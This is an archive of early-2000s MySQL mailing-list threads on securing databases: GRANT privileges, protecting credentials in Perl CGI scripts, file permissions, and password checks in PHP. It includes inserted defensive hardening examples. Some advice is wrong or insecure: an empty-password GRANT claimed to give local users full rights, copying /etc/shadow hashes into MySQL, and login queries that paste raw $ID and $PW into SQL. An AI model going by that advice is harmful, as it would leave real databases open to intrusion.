Now, my problem is that I am paranoid about hackers who are able to break
in through apache and assume the user "apache". Who can then issue
mysql "selects" and "inserts" on the cookies table.

Does anyone have pointers to mysql security docs and such where I can do
what I want without these concerns?

Thanks a buncho in advance!


--Raj

PS:

THANK YOU MYSQL DEVELOPERS What a god-send!! *









Re: MySQL security

2002-07-16 Thread Jeremy Zawodny

On Tue, Jul 16, 2002 at 02:51:59PM +0200, Mathias Bertelsen wrote:
> Hello
> 
> Do you think MySQL is secure enough to keep peoples bookkeeping in?
> is it safe enough to use without risk of losing important data? Is
> it necessary to do anything to make it secure? (eg. use of
> transactions/backup/power failure security)

It is.
-- 
Jeremy D. Zawodny |  Perl, Web, MySQL, Linux Magazine, Yahoo!
<[EMAIL PROTECTED]>  |  http://jeremy.zawodny.com/

MySQL 3.23.51: up 47 days, processed 1,016,208,690 queries (246/sec. avg)





Re: MySQL security

2002-07-16 Thread Dan Lamb

We use MySQL to store financial data and have never had a problem.

The things you mentioned (transactions/backup/power failure security) should
be used with ANY database that stores critical information that cannot be
lost.  No database is completely bullet proof.  Regular backups stored at an
offsite location, UPS power supply protection, transactions, and LOTS of
testing before going live are the best things you can do.

Regards,
Daniel Lamb

- Original Message -
From: "Mathias Bertelsen" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Tuesday, July 16, 2002 8:51 AM
Subject: MySQL security


>
> Hello
>
> I have a question for all you MySQL people out there
>
> We are a group of people planning to make a small open source
> ERP/accounting/finance program. We have earlier used MySQL to great
> satisfaction in other areas and would like to use it here. My question is:
>
> Do you think MySQL is secure enough to keep peoples bookkeeping in? is it
> safe enough to use without risk of losing important data? Is it necessary to
> do anything to make it secure? (eg. use of transactions/backup/power failure
> security)
>
> Any comments are welcome :)
>
> /Mathias
>
>






MySQL security

2002-07-16 Thread Mathias Bertelsen

Hello

I have a question for all you MySQL people out there

We are a group of people planning to make a small open source
ERP/accounting/finance program. We have earlier used MySQL to great
satisfaction in other areas and would like to use it here. My question is:

Do you think MySQL is secure enough to keep peoples bookkeeping in? is it
safe enough to use without risk of losing important data? Is it necessary to
do anything to make it secure? (eg. use of transactions/backup/power failure
security)

Any comments are welcome :)

/Mathias






RE: MySQL security

2002-04-16 Thread nigel wood

On Tue, 16 Apr 2002, David Ayliffe wrote:
> Are MySQL really going to give you details of their past security
> 'issues'?
> 
> Think about it.  Try going underground and looking on some exploit
> sites.
> 
> DA
> 
> 
> >
> Hi,
> I'm working on security breaches in MySQL. Can someone guide me in this.
> To be precise can you tell me about some literature, some book which is
> easy to understand and also profound ! If anyone is working on that,
> I'll be more than happy to interact. Thanking you.

Why not? If a vulnerability is discovered for which no known exploit exists
it's reasonable to withhold that information (for a limited period) whilst a fix
is developed.  If the vulnerability is showing up on exploit sites I'd expect
MySQL AB to be shouting its existence (if not howto details) from the roof
tops so the users can take countermeasures whether a fix exists or not. 

Nigel





RE: MySQL security

2002-04-16 Thread David Ayliffe

Are MySQL really going to give you details of their past security
'issues'?

Think about it.  Try going underground and looking on some exploit
sites.

DA


>
Hi,
I'm working on security breaches in MySQL. Can someone guide me in this.
To be precise can you tell me about some literature, some book which is
easy to understand and also profound ! If anyone is working on that,
I'll be more than happy to interact. Thanking you.

Paras.






MySQL security

2002-04-16 Thread Paras G. Mukadam

Hi,
I'm working on security breaches in MySQL. Can someone guide me
in this. To be precise can you tell me about some literature,
some book which is easy to understand and also profound ! If
anyone is working on that, I'll be more than happy to interact.
Thanking you.

Paras.







Re: MySQL security on Win2k server ??

2002-02-22 Thread Michael Vejs


- Original Message -
From: <[EMAIL PROTECTED]>
To: Michael Vejs <[EMAIL PROTECTED]>
Sent: Friday, February 22, 2002 12:45 PM
Subject: Re: MySQL security on Win2k server ??


> Your message cannot be posted because it appears to be either spam or
> simply off topic to our filter. To bypass the filter you must include
> one of the following words in your message:
>
> sql,query
>
> If you just reply to this message, and include the entire text of it in the
> reply, your reply will go through. However, you should
> first review the text of the message to make sure it has something to do
> with MySQL. Just typing the word MySQL once will be sufficient, for example.
>
> You have written the following:
>
> Hi
>
> I'm currently about to secure my webserver which is a Windows 2000 Server and
> I'm in doubt on which security I can set and where..
>
> My Q is therefore:
>
> Which user is required to access which folder(s) ?
>
> Regards
>
> Michael Vejs
> Denmark
>
>
>






Re: mySQL security

2002-01-09 Thread Sherwin Ang

It should also be made clear that MySQL users are different from system
users.  The MySQL root account is also different from the system root account.

You can restrict users to certain databases with the appropriate parameters
on what the db user can and cannot do.

mysql> use mysql;
mysql> grant insert, select, update on testdb.* to user@localhost identified by 'hispassword';
mysql> flush privileges;

this would only allow him to do selects, updates and inserts on the database
testdb and all tables underlying it, but not delete, read from files, etc.

GRANT is in detail at
http://www.mysql.com/documentation/mysql/bychapter/manual_MySQL_Database_Administration.html#GRANT


Thanks,

Sherwin Ang
Web Programmer / Systems Administrator
Alchemy Solutions
http://www.alchemy.com.ph
Creative. Technology.

Tridel Technologies, Inc.
7th Floor Hanston Building
Emerald Ave., Ortigas Center
Pasig City

Tel: (632) 634-5141/ (632) 634-5140
Fax: (632) 634-5139


- Original Message -
From: "Gerald R. Jensen" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Tuesday, January 08, 2002 11:25 AM
Subject: Re: mySQL security


> Dear "- -":
>
> I would revoke all permissions for dummy, then create new permissions for
> users on a database-by-database basis. If you look at the syntax for GRANT
> in the manual, you can stipulate which databases a user would have access
> to.
>
> A word of caution: don't use root. Create a user for yourself and give it
> full permissions, then use it to administer the database.
>
> Gerald Jensen
>
> - Original Message -
> From: "- -" <[EMAIL PROTECTED]>
> To: <[EMAIL PROTECTED]>
> Sent: Monday, January 07, 2002 9:13 PM
> Subject: mySQL security
>
>
> Hi all,
>
> I have set up mySQL database server on my web server running on RH Linux 7.2.
> There are 2 user accounts, root and dummy who can access the databases. I'm
> wondering how to restrict the access to mysql (the db which stores user id,
> password, etc...).  Right now, both users can run select, delete, update...
> statements on this database.  How do I set the permissions so that only root
> can view, modify, delete tables or data in this database?
>
> Thanks in advance,
> kaz
>
>
>







Re: mySQL security

2002-01-07 Thread Gerald R. Jensen

Dear "- -":

I would revoke all permissions for dummy, then create new permissions for
users on a database-by-database basis. If you look at the syntax for GRANT
in the manual, you can stipulate which databases a user would have access
to.

A word of caution: don't use root. Create a user for yourself and give it
full permissions, then use it to administer the database.

Gerald Jensen

- Original Message -
From: "- -" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Monday, January 07, 2002 9:13 PM
Subject: mySQL security


Hi all,

I have set up mySQL database server on my web server running on RH Linux 7.2.
There are 2 user accounts, root and dummy who can access the databases. I'm
wondering how to restrict the access to mysql (the db which stores user id,
password, etc...).  Right now, both users can run select, delete, update...
statements on this database.  How do I set the permissions so that only root
can view, modify, delete tables or data in this database?

Thanks in advance,
kaz



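The lock-down kaz asks for, done the way Gerald suggests (revoke everything
first, then grant per database) with the kind of per-database GRANT Sherwin
Ang shows, written out as an added example; it is not code from any poster
in this thread. It is also the usual answer to raj's worry about a compromised
"apache" user further down the page: the web application connects as an
account that can only touch its own tables. The account name dummy and the host
localhost come from the thread; the database name webapp and the password are
assumptions. The GRANT ... IDENTIFIED BY form matches the MySQL versions
discussed here (MySQL 8.0 removed it; there the account is made with CREATE
USER first), and REVOKE ALL PRIVILEGES, GRANT OPTION FROM needs MySQL 4.1.2 or
later.

```sql
-- Added example (editor's own, not from any poster in this thread).
-- Goal: the account kaz calls "dummy" keeps only what a web application
-- needs on its own database and loses every privilege on the "mysql"
-- grant-table database. "webapp" and the password are assumptions.
-- Run as an administrative account.

-- 1. Strip everything dummy holds today: global, database, table and
--    column privileges in one statement (MySQL 4.1.2+). Before that,
--    global (ON *.*) and database-level (ON mysql.*) privileges had to
--    be revoked separately.
REVOKE ALL PRIVILEGES, GRANT OPTION FROM 'dummy'@'localhost';

-- 2. Re-grant the minimum: read and write rows in the application
--    database only. No DELETE, no DROP, no FILE (so no LOAD DATA or
--    SELECT ... INTO OUTFILE), and nothing on mysql.* at all.
--    Add DELETE only if the application really removes rows.
GRANT SELECT, INSERT, UPDATE ON webapp.* TO 'dummy'@'localhost'
    IDENTIFIED BY 'placeholder-change-me';

-- 3. GRANT and REVOKE take effect at once; FLUSH PRIVILEGES is only
--    required after editing the grant tables directly, so it is
--    harmless here and kept for the habit.
FLUSH PRIVILEGES;

-- 4. Verify. Expect one "GRANT USAGE ON *.*" line (meaning: no global
--    privileges) plus the webapp.* line, and no mention of mysql.*.
SHOW GRANTS FOR 'dummy'@'localhost';

-- 5. Also look for anonymous accounts (User = ''); an anonymous
--    account on localhost lets any local login connect without a
--    password. Drop any that are not deliberately wanted.
SELECT User, Host FROM mysql.user WHERE User = '';
```

SHOW GRANTS is the check worth running after any change: it reports what the
server actually enforces, while the GRANT statement only says what was
intended.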




mySQL security

2002-01-07 Thread - -

Hi all,

I have set up mySQL database server on my web server running on RH Linux 7.2.
There are 2 user accounts, root and dummy who can access the databases. I'm
wondering how to restrict the access to mysql (the db which stores user id,
password, etc...).  Right now, both users can run select, delete, update...
statements on this database.  How do I set the permissions so that only root
can view, modify, delete tables or data in this database?

Thanks in advance,
kaz







RE: MySQL Security w/ PHP

2001-10-29 Thread Carsten H. Pedersen

> Hi!
>
> On Oct 28, Kevin Maynard wrote:
> > I have been building an extensive dB with MySQL for a large Insurance
> > Company and am nearing the completion stage.  I have built several PHP
> > forms to show the preliminary pages to the various groups who will be
> > using this dB.
> >
> > I have created the sign-in page where each user types in their ID
> > and PW.  From then on each query uses those variables for credentials.
> > To avoid duplication, I would like to use the USER form from the MySQL
> > dB.
>
> You shouldn't do it.
> This table is used by mysql server internally,
> and shouldn't be accessed directly.
> To modify this user table one should use GRANT and REVOKE statements.
> To read it - SHOW GRANTS.
>
> (actually, it can be accessed directly, but ONLY if you know
> what you're doing. It looks like you aren't)
>
> > Since that uses the Password("PW") function, I can't seem to get my
> > validation query to work properly.  For example:
> >
> > SELECT User,Password from user where (User=$ID AND Password=$PW);
> >
> > Result: Empty Set.
> >
> > SELECT User,Password from user where (User=$ID AND Password($PW));
> >
> > Result: Will match User only, will accept ANY PW.
>
> SELECT User,Password from user where (User=$ID AND
> Password=PASSWORD($PW));
>
> > Does anyone know how to properly check off the PW from the User
> table in
> > the MySQL db?
>
> The proper way is not to use system tables, and mysql db in general.
> Create your own database, and User table in it.
> And, the last, you'd better use MD5() instead of PASSWORD().

Another good reason not to do this: At startup, mysqld reads all
privileges for all users into memory - and they stay there whether
or not those people log in. Seems to be a pretty stupid way of
using up your RAM. Add to that the time spent by MySQL checking
permissions for one in thousands of users for every single query
- ugh...

/ Carsten
--
Carsten H. Pedersen
keeper and maintainer of the bitbybit.dk MySQL FAQ
http://www.bitbybit.dk/mysqlfaq







Re: MySQL Security w/ PHP

2001-10-28 Thread Sergei Golubchik

Hi!

On Oct 28, Kevin Maynard wrote:
> I have been building an extensive dB with MySQL for a large Insurance 
> Company and am nearing the completion stage.  I have built several PHP 
> forms to show the preliminary pages to the various groups who will be 
> using this dB.
> 
> I have created the sign-in page where each user types in their ID 
> and PW.  From then on each query uses those variables for credentials.  
> To avoid duplication, I would like to use the USER form from the MySQL 
> dB.

You shouldn't do it.
This table is used by mysql server internally,
and shouldn't be accessed directly.
To modify this user table one should use GRANT and REVOKE statements.
To read it - SHOW GRANTS.

(actually, it can be accessed directly, but ONLY if you know
what you're doing. It looks like you aren't)

> Since that uses the Password("PW") function, I can't seem to get my 
> validation query to work properly.  For example:
> 
> SELECT User,Password from user where (User=$ID AND Password=$PW);
> 
> Result: Empty Set.
> 
> SELECT User,Password from user where (User=$ID AND Password($PW));
> 
> Result: Will match User only, will accept ANY PW.

SELECT User,Password from user where (User=$ID AND Password=PASSWORD($PW));

> Does anyone know how to properly check off the PW from the User table in 
> the MySQL db?

The proper way is not to use system tables, and mysql db in general.
Create your own database, and User table in it.
And, the last, you'd better use MD5() instead of PASSWORD().

Regards,
Sergei

-- 
MySQL Development Team
   __  ___ ___   __
  /  |/  /_ __/ __/ __ \/ /   Sergei Golubchik <[EMAIL PROTECTED]>
 / /|_/ / // /\ \/ /_/ / /__  MySQL AB, http://www.mysql.com/
/_/  /_/\_, /___/\___\_\___/  Osnabrueck, Germany
   <___/





RE: MySQL Security w/ PHP

2001-10-28 Thread Quentin Bennett

Have you tried something like

SELECT User,Password from user where (User=$ID AND Password($PW)=password);

i.e. equate the result of password("string") to the stored, encrypted,
password

Regards

Quentin

-Original Message-
From: Kevin Maynard [mailto:[EMAIL PROTECTED]]
Sent: Monday, 29 October 2001 11:52 a.m.
To: [EMAIL PROTECTED]
Subject: MySQL Security w/ PHP


I have been building an extensive dB with MySQL for a large Insurance 
Company and am nearing the completion stage.  I have built several PHP 
forms to show the preliminary pages to the various groups who will be 
using this dB.

I have created the sign-in page where each user types in their ID 
and PW.  From then on each query uses those variables for credentials.  
To avoid duplication, I would like to use the USER form from the MySQL 
dB.  Since that uses the Password("PW") function, I can't seem to get my 
validation query to work properly.  For example:

SELECT User,Password from user where (User=$ID AND Password=$PW);

Result: Empty Set.

SELECT User,Password from user where (User=$ID AND Password($PW));

Result: Will match User only, will accept ANY PW.

Does anyone know how to properly check off the PW from the User table in 
the MySQL db?

Thanks,

Kevin






MySQL Security w/ PHP

2001-10-28 Thread Kevin Maynard

I have been building an extensive dB with MySQL for a large Insurance 
Company and am nearing the completion stage.  I have built several PHP 
forms to show the preliminary pages to the various groups who will be 
using this dB.

I have created the sign-in page where each user types in their ID 
and PW.  From then on each query uses those variables for credentials.  
To avoid duplication, I would like to use the USER form from the MySQL 
dB.  Since that uses the Password("PW") function, I can't seem to get my 
validation query to work properly.  For example:

SELECT User,Password from user where (User=$ID AND Password=$PW);

Result: Empty Set.

SELECT User,Password from user where (User=$ID AND Password($PW));

Result: Will match User only, will accept ANY PW.

Does anyone know how to properly check off the PW from the User table in 
the MySQL db?

Thanks,

Kevin






Re: Mysql Security (fwd)

2001-07-26 Thread Christian Grimm

> The fact that he has logged on should not require him to specify
> password again.

This fact means: when a user is logged in, he is allowed to use the 
mysql-server:

Use this one (every logged-on user on localhost has all rights to 
every base and table without pw):

GRANT USAGE ON  *.*
TO "%@localhost"
IDENTIFIED BY "";

Hope that's the right one... ;-)
Christian






Re: Mysql Security (fwd)

2001-07-26 Thread sachin shetty



-- Forwarded message --
Date: Thu, 26 Jul 2001 13:15:06 -0400 (EDT)
From: sachin shetty <[EMAIL PROTECTED]>
To: Christian Grimm <[EMAIL PROTECTED]>
Subject: Re: Mysql Security


Thanks Christian

But when a user connects to the server, isn't it mandatory to specify the
password? Is it possible to authenticate the user by only his Unix
username? The fact that he has logged on should not require him to specify
the password again.

Thanks again








Mysql Security

2001-07-26 Thread Christian Grimm

Hello my friend,
Sure, it's possible!
Additionally, you can insert the encrypted password hash from your local
/etc/shadow file into the MySQL user table to verify the correct password
and authenticate the user.

Hope it helps
Christian

sachin shetty wrote:

> Hello
> 
> Is it possible to authenticate a user running the mysql client by comparing
> the Unix username ($LOGNAME) with the user table in MySQL? It seems more
> secure than specifying the authentication parameters in a configuration
> file or along with the client.
> Thanks
> Sachin
> 
> 




Mysql Security

2001-07-26 Thread sachin shetty


Hello

Is it possible to authenticate a user running the mysql client by comparing
the Unix username ($LOGNAME) with the user table in MySQL? It seems more
secure than specifying the authentication parameters in a configuration
file or along with the client.

Thanks 

Sachin






RE: MySQL security settings

2001-06-08 Thread Neil Zanella


On Fri, 8 Jun 2001, nyon wrote:

> I installed MySQL on Windows NT.
> Currently, I log in using the anonymous user.
> I can't seem to log in as the root user.
> The syntax is : mysql -u root -p xxx

With the above command mysql thinks you are trying to access
database xxx using a password to be specified on the command line.
The correct syntax is:

mysql -u root -pxxx

Note that there is no space between the -p and the password.
Also note that unless you are executing this command from
within a script this is insecure as other users could sniff
your database password from the command line.

Neil
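An added example around the point Neil makes (not code from the list post): a password embedded in an argument (`-pxxx` or `--password=xxx`) is visible to every local user in the process list for as long as the client runs, a bare `-p` makes the client prompt, and `-p xxx` hands `xxx` to the client as the database name. The usual mitigation is a `[client]` option file that the mysql client reads on its own when it is `~/.my.cnf`, created so that only its owner can read it. The helper names, the temporary paths and the secret below are constructed for this example.

```shell
#!/bin/sh
# Added example, not from the list post. Two helpers: one flags a mysql
# command line that carries the password inside an argument, the other
# writes a [client] option file with mode 0600 as the mitigation.
# Paths and the secret are constructed for this example.

# argv_exposes_password ARGS...: returns 0 (true) when any argument
# carries a password value, 1 otherwise. A bare -p means "prompt", and
# "-p xxx" makes xxx the database name, so neither counts as exposure.
argv_exposes_password() {
    for arg in "$@"; do
        case "$arg" in
            -p)            ;;                # bare -p: client prompts
            -p?*)          return 0 ;;       # -pxxx: secret in argv
            --password=?*) return 0 ;;       # --password=xxx: same
        esac
    done
    return 1
}

# write_client_cnf FILE SECRET: write a [client] section holding the
# password into FILE with mode 0600 (umask 077 while creating it, then
# an explicit chmod in case FILE already existed with wider bits).
write_client_cnf() {
    cnf="$1"; secret="$2"
    old_umask=$(umask)
    umask 077
    printf '[client]\npassword=%s\n' "$secret" > "$cnf"
    umask "$old_umask"
    chmod 600 "$cnf"
}

# cnf_is_private FILE: 0 when FILE's mode is exactly 0600, 1 otherwise.
# find -perm with an octal argument is POSIX, so this works on GNU and BSD.
cnf_is_private() {
    [ -n "$(find "$1" -perm 600 -print)" ]
}

# Demo: flag an exposing command line, then build a private option file.
if argv_exposes_password mysql -u root -pxxx; then
    echo "mysql -u root -pxxx: password exposed in argv"
fi
demo_dir=$(mktemp -d)
write_client_cnf "$demo_dir/my.cnf" 'constructed-secret'
cnf_is_private "$demo_dir/my.cnf" && echo "$demo_dir/my.cnf is 0600"
rm -rf "$demo_dir"
```

With the option file in place the client is started as plain `mysql -u root`, so no secret ever reaches the process list; the check function is what you would run over a shell history or a cron table to find the command lines that still need converting.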






RE: MySQL security settings

2001-06-07 Thread nyon

I installed MySQL on Windows NT.
Currently, I log in using the anonymous user.
I can't seem to log in as the root user.
The syntax is: mysql -u root -p xxx

It seems funny, as I can see the root password in the MySQL database --> user table.

Any help ?

Nyon



Re: MySQL Security

2001-04-04 Thread William R. Mussatto

Apache can be set to run your CGI as your user, which means that it could 
be set world-unreadable, I think.

On Wed, 4 Apr 2001, Taing Nguon wrote:

> Date: Wed, 4 Apr 2001 07:14:33 +0700
> From: Taing Nguon <[EMAIL PROTECTED]>
> To: "William R. Mussatto" <[EMAIL PROTECTED]>
> Cc: [EMAIL PROTECTED]
> Subject: Re: MySQL Security
> 
> > Make sure that the files are not world readable.
> 
> On a Linux system, in order to run a CGI Perl script, that Perl script
> must be 755. It is readable by any user, and Perl is written in text format, so
> it is easy to learn the user and password of MySQL. What do you think about
> this? Need more help.
> 
> Million of thanks
> 
> Regards
> Taing Nguon
> 
> 
> > On Tue, 3 Apr 2001, Taing Nguon wrote:
> >
> > > Date: Tue, 3 Apr 2001 09:52:30 +0700
> > > From: Taing Nguon <[EMAIL PROTECTED]>
> > > To: [EMAIL PROTECTED]
> > > Subject: MySQL Security
> > >
> > > Dear sir or madam
> > >
> > > A MySQL user account is not related to a user account on the Linux
> > > system, so they can be different.
> > >
> > > My problem is that I use Perl DBI to interact with the MySQL server as below:
> > >
> > > --
> > > use DBI;
> > > $dbh = DBI->connect("DBI:mysql:DatabaseName","$user","$password");
> > >
> > > ---
> > >
> > > So $user and $password can be known by any user on the Linux system because
> > > they are written in text format, and the database can be changed or updated
> > > by other users on the Linux system easily by using Perl DBI. Is there any
> > > way to prevent the database from being changed? Million of thanks
> > >
> > >
> > > Regards
> > >
> > > Taing Nguon
> > >
> > >
> > >
> >
> > Sincerely,
> >
> > William Mussatto, Senior Systems Engineer
> > CyberStrategies, Inc
> > ph. 909-920-9154 ext. 27
> >
> 
> 
> 

Sincerely,

William Mussatto, Senior Systems Engineer
CyberStrategies, Inc
ph. 909-920-9154 ext. 27






Re: MySQL Security

2001-04-03 Thread Van

Taing Nguon wrote:
> 
> > Make sure that the files are not world readable.
> 
> On a Linux system, in order to run a CGI Perl script, that Perl script
> must be 755. It is readable by any user, and Perl is written in text format, so
> it is easy to learn the user and password of MySQL. What do you think about
> this? Need more help.
> 
> Million of thanks
> 
> Regards
> Taing Nguon
> 
Taing:

Reread my last post.  And, if not, step-by-step:
In httpd.conf
# Run web-server as this user
User www

chown www.www /www -Rf
chmod 0750 /www
chmod o-rwx /www -Rf

Done.  Now, your perl scripts will run as user www and nobody on the system
will be able to read the perl scripts unless you add them to the www group. 
Something tells me you won't.

Regards,
Van
-- 
=
Linux rocks!!!   http://www.dedserius.com
=





Re: MySQL Security

2001-04-03 Thread

"Taing  Nguon" <[EMAIL PROTECTED]> wrote:
>
> > Make sure that the files are not world readable.
> 
> On a Linux system, in order to run a CGI Perl script, that Perl script
> must be 755. It is readable by any user, and Perl is written in text format, so

Not entirely true.  The reason the files are set to 755 on your box is because they are 
not owned by the same user as that which is running the Apache web daemon - remember 
most Apache setups (at least the smart ones) have Apache doing a chroot to "nobody" to 
prevent someone from breaking into your system as root via Apache.
--
===
"If you put three drops of poison into a 100 percent pure Java, you get - Windows. If 
you put a few drops of Java into Windows, you still have Windows."
-- Sun Microsystems CEO, Scott McNealy





Re: MySQL Security

2001-04-03 Thread Taing Nguon

> Make sure that the files are not world readable.

On a Linux system, in order to run a CGI Perl script, that Perl script
must be 755. It is readable by any user, and Perl is written in text format, so
it is easy to learn the user and password of MySQL. What do you think about
this? Need more help.

Million of thanks

Regards
Taing Nguon


> On Tue, 3 Apr 2001, Taing Nguon wrote:
>
> > Date: Tue, 3 Apr 2001 09:52:30 +0700
> > From: Taing Nguon <[EMAIL PROTECTED]>
> > To: [EMAIL PROTECTED]
> > Subject: MySQL Security
> >
> > Dear sir or madam
> >
> > A MySQL user account is not related to a user account on the Linux
> > system, so they can be different.
> >
> > My problem is that I use Perl DBI to interact with the MySQL server as below:
> >
> > --
> > use DBI;
> > $dbh = DBI->connect("DBI:mysql:DatabaseName","$user","$password");
> >
> > ---
> >
> > So $user and $password can be known by any user on the Linux system because
> > they are written in text format, and the database can be changed or updated
> > by other users on the Linux system easily by using Perl DBI. Is there any
> > way to prevent the database from being changed? Million of thanks
> >
> >
> > Regards
> >
> > Taing Nguon
> >
> >
> >
>
> Sincerely,
>
> William Mussatto, Senior Systems Engineer
> CyberStrategies, Inc
> ph. 909-920-9154 ext. 27
>







Re: MySQL Security

2001-04-03 Thread Taing Nguon


> I would think that if the user does not have grant options set on the
> particular DB in the mysql.db table, then he would not be able to access
it
> using DBI, even if he is a local user.

I have already tried to do it myself, and I found that although a user
has no MySQL user account, he can still update data in the MySQL database
via Perl DBI, because they know the MySQL user and password when your Perl
code is written in text format. Need more help.
Million of thanks

Regards

Taing Nguon

> At 10:52 PM 4/2/01, you wrote:
> >Dear sir or madam
> >
> > MySQL user's account is not related to user's account on Linux
> > System, so they can be different.
> >
> >My problem is that I use Perl DBI to interact with the MySQL server as below:
> >
> >--
> >use DBI;
> >$dbh = DBI->connect("DBI:mysql:DatabaseName","$user","$password");
> >
> >---
> >
> >So $user and $password can be known by any users in Linux system
> >because  they are written in text format and DataBase can be changed or
> >updated by other users in Linux system easily by using Perl DBI. Is there
> >any way to prevent the database from being changed? Million of thanks
> >
> >
> >Regards
> >
> >Taing Nguon
>
>







Re: MySQL Security

2001-04-03 Thread William R. Mussatto

Make sure that the files are not world readable.

On Tue, 3 Apr 2001, Taing Nguon wrote:

> Date: Tue, 3 Apr 2001 09:52:30 +0700
> From: Taing Nguon <[EMAIL PROTECTED]>
> To: [EMAIL PROTECTED]
> Subject: MySQL Security
> 
> Dear sir or madam
> 
> A MySQL user account is not related to a user account on the Linux
> system, so they can be different.
> 
> My problem is that I use Perl DBI to interact with the MySQL server as below:
> 
> --
> use DBI;
> $dbh = DBI->connect("DBI:mysql:DatabaseName","$user","$password");
> 
> ---
> 
> So $user and $password can be known by any user on the Linux system because
> they are written in text format, and the database can be changed or updated
> by other users on the Linux system easily by using Perl DBI. Is there any
> way to prevent the database from being changed? Million of thanks
> 
> 
> Regards
> 
> Taing Nguon
> 
> 
> 

Sincerely,

William Mussatto, Senior Systems Engineer
CyberStrategies, Inc
ph. 909-920-9154 ext. 27






Re: MySQL Security

2001-04-02 Thread Van

Taing Nguon wrote:
> 
> Dear sir or madam
> 
> A MySQL user account is not related to a user account on the Linux system, so they 
> can be different.
> 
> My problem is that I use Perl DBI to interact with the MySQL server as below:
> 
> --
> use DBI;
> $dbh = DBI->connect("DBI:mysql:DatabaseName","$user","$password");
> 
> ---
> 
> So $user and $password can be known by any user on the Linux system because they are 
> written in text format, and the database can be changed or updated by other users on 
> the Linux system easily by using Perl DBI. Is there any way to prevent the database 
> from being changed? Million of thanks
> 
> Regards
> 
> Taing Nguon
Taing:

I use php3 to do my apps for web applications and chown the /www/ files to
www.www and chmod them to 0750 with the server running as user www.

This prevents any users from viewing the source code:  i.e. the /www/ files that
contain your perl scripts.  This might be an option for you if the perl user can
run as www.www and you can run those perl scripts as user www within the web
context.

This is just how I do it, but, others might have different implementations.

Best Regards,
Van
-- 
=
Linux rocks!!!   http://www.dedserius.com
=
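An added example (not code from Van's posts) that carries out the permission steps he gives here and, step by step, in his 2001-04-03 reply: run the web server as its own user, own the web root as that user, set the directory to 0750 and strip the "other" bits below it. It adds the audit a practitioner wants afterwards, a listing of whatever is still readable, writable or executable by "other". The web user name `www` follows the thread; the helper names and the tree built by `demo_webroot()` are constructed here for illustration. The `User www` line in httpd.conf is server configuration rather than a file mode, so it is not part of the script.

```shell
#!/bin/sh
# Added example, not code from the list posts. Applies Van's hardening
# steps to a directory passed as a parameter and audits the result.
# The web user (www) follows the thread; the demo tree is constructed.

# harden_webroot ROOT USER GROUP: apply Van's permission steps. chown
# needs root privileges, so it is reported and skipped when it fails;
# the chmod steps still run. "USER:GROUP" is the portable spelling of
# the "www.www" form used in the post.
harden_webroot() {
    root="$1"; user="$2"; group="$3"
    if ! chown -R "$user:$group" "$root" 2>/dev/null; then
        echo "note: chown -R $user:$group $root skipped (needs root)" >&2
    fi
    chmod 0750 "$root"
    chmod -R o-rwx "$root"
}

# world_accessible ROOT: print every path below ROOT with any "other"
# bit set. The octal -perm tests are POSIX, so this runs on GNU and BSD.
world_accessible() {
    find "$1" \( -perm -004 -o -perm -002 -o -perm -001 \) -print
}

# world_accessible_count ROOT: number of such paths; 0 means the tree
# is private to the owner and the group, which is the state Van
# describes ("nobody on the system will be able to read the perl
# scripts unless you add them to the www group").
world_accessible_count() {
    world_accessible "$1" | wc -l | tr -d ' '
}

# demo_webroot: build a constructed tree holding the 0755 CGI script from
# the thread, i.e. the state before hardening. Prints the tree's path.
demo_webroot() {
    dir=$(mktemp -d)
    mkdir "$dir/cgi-bin"
    printf '#!/usr/bin/perl\nuse DBI;\n# DSN, user and password would sit here\n' \
        > "$dir/cgi-bin/app.pl"
    chmod 755 "$dir" "$dir/cgi-bin" "$dir/cgi-bin/app.pl"
    echo "$dir"
}

# Demo run: audit, harden, audit again.
webroot=$(demo_webroot)
echo "before: $(world_accessible_count "$webroot") world-accessible path(s)"
harden_webroot "$webroot" www www
echo "after:  $(world_accessible_count "$webroot") world-accessible path(s)"
rm -rf "$webroot"
```

The audit is the part worth keeping around: run `world_accessible /www` after every deployment, because a single file copied in with the default umask reopens the hole the chmod closed.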





MySQL Security

2001-04-02 Thread Taing Nguon

Dear sir or madam

A MySQL user account is not related to a user account on the Linux system, so they can 
be different.

My problem is that I use Perl DBI to interact with the MySQL server as below:

--
use DBI;
$dbh = DBI->connect("DBI:mysql:DatabaseName","$user","$password");

---

So $user and $password can be known by any user on the Linux system because they are 
written in text format, and the database can be changed or updated by other users on 
the Linux system easily by using Perl DBI. Is there any way to prevent the database 
from being changed? Million of thanks


Regards

Taing Nguon





Re: mysql security issue

2001-01-15 Thread Sergei Golubchik

Hi!

On Jan 15, Nicolas GREGOIRE wrote:
>
>
> Sergei Golubchik a écrit :
> >
> > Hi!
> >
> > On Jan 12, João Gouveia wrote:
> > > Hi,
> > >
> > > I believe I've found a problem in MySQL. Here are some tests I've made on
> > > 3.22.27 x86 (also tested on v3.22.32, the latest stable, although I didn't
> > > debug it, just tested to see if it crashes).
> >
> > Confirmed up to latest 3.23
> > This will be fixed ASAP!
>
> Is it fixed now ?
> Is there a patch available ?
>
> Please give us info, our servers are in the wild 
>
>
> Nicob

The new MySQL release with this bug fixed will be available today
(probably, in 5-10 hours).

Regards,
Sergei

--
MySQL Development Team
   __  ___ ___   __
  /  |/  /_ __/ __/ __ \/ /   Sergei Golubchik <[EMAIL PROTECTED]>
 / /|_/ / // /\ \/ /_/ / /__  MySQL AB, http://www.mysql.com/
/_/  /_/\_, /___/\___\_\___/  Helsinki, Finland (till Sunday)
   <___/





Re : mysql security issue, overflow

2001-01-15 Thread Nicolas GREGOIRE

Sergei Golubchik a écrit :
> 
> Hi!
> 
> On Jan 12, João Gouveia wrote:
> > Hi,
> >
> > I believe I've found a problem in MySQL. Here are some tests I've made on
> > 3.22.27 x86 (also tested on v3.22.32, the latest stable, although I didn't
> > debug it, just tested to see if it crashes).
> 
> Confirmed up to latest 3.23
> This will be fixed ASAP!


Is it fixed now ?
Is there a patch available ?

Please give us info, our servers are in the wild 


Nicob





Re: mysql security issue, overflow

2001-01-12 Thread Sergei Golubchik

Hi!

On Jan 12, João Gouveia wrote:
> Hi,
> 
> I believe I've found a problem in MySQL. Here are some tests I've made on
> 3.22.27 x86 (also tested on v3.22.32, the latest stable, although I didn't
> debug it, just tested to see if it crashes).

Confirmed up to latest 3.23
This will be fixed ASAP!

Thanks for the bug report (though you'd better mail this to us first,
and only after some - small - delay to the public).

> 
> On one terminal:
> 
